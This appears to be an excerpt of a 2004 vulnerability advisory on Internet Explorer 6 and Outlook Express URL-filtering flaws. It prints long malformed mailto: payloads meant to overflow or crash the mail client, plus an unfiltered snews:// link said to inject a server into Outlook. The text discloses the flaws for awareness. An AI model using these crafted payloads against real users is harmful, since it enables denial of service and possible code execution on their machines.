Microsoft Internet Explorer Multiple Vulnerabilities

"Rafel Ivgi, The-Insider"
Wednesday Jan. 21, 2004

Every time i Read about a Vulnerability concerning I.E i believe moreand more and I.E is the biggest backdoor ever. After the CONTENT-TYPE: bug that allowed to download exe's as audio'sand all the patches, I.E 6 still has parsing problems.

I discovered that amazingly with another wonderful microsoft software, i can force downloads on users, fake downloaded file extentions and names,inject scripts to the "blank" file, run a lot of different applications, cause a lot of errors and see the content of binary files inside I.E, cause a buffer overflow in outlook and even D.O.S the system.Before you read the following text i believe the most dangerous bug in I.Eis the possibilityof actively creating or poping up new windows *without alimit*(only memory limit). This makes it easyto create many errors, overflows , and to D.O.S internet users.

**************************************************

Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)

Microsoft has inserted a filtering engine inside Internet Explorer. Thisengine verifies thatonly secure,valid and appropriate(in syntax) data will be passed on toexternal applications.
**************************************************
The filtering engine skips a few important checks such as the "MAILTO:"protocol. With no filteringit allows inappropriate data to be sent to the default mail client.

Example:
mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%
C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99
%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00
%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2
%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2
%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaa
aaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6
%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00
%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa
%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99
%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00
%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2
%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2
%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaa
aaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6
%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%
00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C
7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3
%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e
2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaa
aaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e
2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98

which pops up the following error message : "The default mail client is notproperly installed".
There should be filtering because there can't be such email address such asthis:(which is accepted by the I.E plugins filter)

mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7
%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa
%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aa
aaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%
e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99
%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e
2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%
a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2
%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C
8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%
aaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaa
a%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaa
aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%
e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaa%a5%e2%99%a6%e2%99%a3aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
**************************************************

This filtering engine also filters outlook links such as the NNTP & SNTPprotocols. Howeverthe security hole appears when an attacker uses the SNEWS protocol, whichhas no filterings.

nntp://aaaaaa.com/aaaaa - filtering active! - results an error message.
sntp://aaaaaaaaaaaaaaa - filtering active! - results an error message.
snews://aaaaaaaaaaaaa - filtering *inactive!* - results activation ofoutlook and server injection into outlook.

---

Story continues at Help Net Security